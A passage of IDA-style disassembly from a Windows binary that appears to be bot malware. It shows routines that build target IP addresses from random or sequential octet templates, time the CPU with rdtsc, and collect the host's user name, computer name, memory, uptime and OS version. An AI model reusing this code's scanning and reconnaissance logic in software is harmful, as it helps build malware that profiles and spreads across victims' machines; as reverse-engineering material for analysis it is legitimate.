; sub_40CA29+91�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_407C49
; ---------------------------------------------------------------------------
loc_407C42: ; CODE XREF: sub_407C2C+31�j
; sub_407C2C:loc_407CCD�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407C49: ; CODE XREF: sub_407C2C+14�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407C68
cmp [ebp+var_C], 0
jz short loc_407C5F
jmp short loc_407C42
; ---------------------------------------------------------------------------
loc_407C5F: ; CODE XREF: sub_407C2C+2F�j
mov [ebp+var_C], 1
jmp short loc_407C6C
; ---------------------------------------------------------------------------
loc_407C68: ; CODE XREF: sub_407C2C+29�j
and [ebp+var_C], 0
loc_407C6C: ; CODE XREF: sub_407C2C+3A�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call ds:dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset dword_419100
push [ebp+arg_0]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call ds:dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call ds:dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call ds:dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call ds:dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
